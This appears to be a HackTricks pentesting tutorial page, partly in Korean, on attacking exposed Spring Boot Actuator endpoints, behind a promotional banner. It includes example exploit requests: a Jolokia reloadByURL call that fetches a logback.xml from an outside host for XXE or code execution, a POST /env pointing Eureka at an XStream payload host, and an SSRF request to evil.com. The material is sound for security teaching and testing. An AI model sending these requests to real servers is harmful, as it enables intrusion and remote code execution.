hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

Spring Actuators

htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 제로부터 영웅까지 배우세요!

다른 방법으로 HackTricks를 지원하는 방법:

• 회사가 HackTricks에 광고되길 원하거나 PDF 형식의 HackTricks를 다운로드하려면 구독 요금제를 확인하세요!
• 공식 PEASS & HackTricks 스왜그를 구입하세요
• The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
• 💬 디스코드 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm을 팔로우하세요.
• 여러분의 해킹 기술을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소로 PR을 제출하세요.

Spring Auth Bypass

From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Exploiting Spring Boot Actuators

Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Key Points:

• Spring Boot Actuators register endpoints such as /health, /trace, /beans, /env, 등을 등록합니다. 버전 1에서 1.4까지는 이러한 엔드포인트에 인증 없이 액세스할 수 있습니다. 버전 1.5부터는 기본적으로 /health 및 /info만 민감하지 않지만, 개발자들은 이 보안을 종종 비활성화합니다.
• 특정 Actuator 엔드포인트는 민감한 데이터를 노출하거나 해로운 작업을 허용할 수 있습니다:
  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, 및 /heapdump.
• Spring Boot 1.x에서는 액추에터가 루트 URL에 등록되지만, 2.x에서는 /actuator/ 기본 경로 아래에 등록됩니다.

Exploitation Techniques:

1. '/jolokia'를 통한 원격 코드 실행:

• /jolokia 액추에터 엔드포인트는 Jolokia 라이브러리를 노출시키며, MBeans에 HTTP 액세스를 허용합니다.
• reloadByURL 작업은 외부 URL에서 로깅 구성을 다시로드하는 데 악용될 수 있으며, 이는 조작된 XML 구성을 통한 블라인드 XXE 또는 원격 코드 실행으로 이어질 수 있습니다.
• 예시 exploit URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

2. '/env'를 통한 구성 수정:

• Spring Cloud 라이브러리가 있는 경우, /env 엔드포인트를 통해 환경 속성을 수정할 수 있습니다.
• 속성을 조작하여 취약점을 악용할 수 있으며, 예를 들어 Eureka serviceURL의 XStream 직렬화 취약점이 있습니다.
• 예시 exploit POST 요청:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

3. 기타 유용한 설정:

• spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, 및 spring.datasource.tomcat.max-active와 같은 속성은 SQL 인젝션 또는 데이터베이스 연결 문자열 변경과 같은 다양한 악용을 위해 조작될 수 있습니다.

추가 정보:

• 기본 액추에터의 포괄적인 목록은 여기에서 찾을 수 있습니다.
• Spring Boot 2.x의 /env 엔드포인트는 속성 수정을 위해 JSON 형식을 사용하지만, 일반적인 개념은 동일합니다.

관련 주제:

1. Env + H2 RCE:

• /env 엔드포인트와 H2 데이터베이스의 조합을 악용하는 세부 정보는 여기에서 찾을 수 있습니다.

2. 잘못된 경로 이름 해석을 통한 Spring Boot SSRF:

• Spring 프레임워크가 HTTP 경로 이름에 대한 매트릭스 매개변수 (;)를 처리하는 방식을 악용하여 서버 측 요청 위조 (SSRF)를 수행할 수 있습니다.
• 예시 exploit 요청:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close